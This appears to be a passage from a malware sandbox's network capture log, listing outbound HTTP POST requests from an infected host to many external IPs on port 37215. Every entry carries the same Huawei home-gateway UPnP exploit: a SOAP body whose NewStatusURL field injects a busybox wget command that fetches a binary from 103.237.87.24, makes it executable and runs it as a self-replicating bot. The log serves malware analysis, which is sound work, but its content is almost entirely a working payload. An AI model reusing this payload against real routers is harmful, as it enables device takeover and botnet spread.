                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1059192.168.2.1352562197.169.116.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431655884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1060192.168.2.1341262157.200.12.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432204008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1061192.168.2.135066441.222.67.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432214022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1062192.168.2.1348890157.24.124.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432214022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1063192.168.2.1334720197.32.112.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432238102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1064192.168.2.135389241.251.230.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432239056 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1065192.168.2.134288036.97.110.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432255983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1066192.168.2.1341532157.177.38.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432272911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1067192.168.2.134703241.130.202.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432280064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1068192.168.2.134767489.129.95.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432303905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
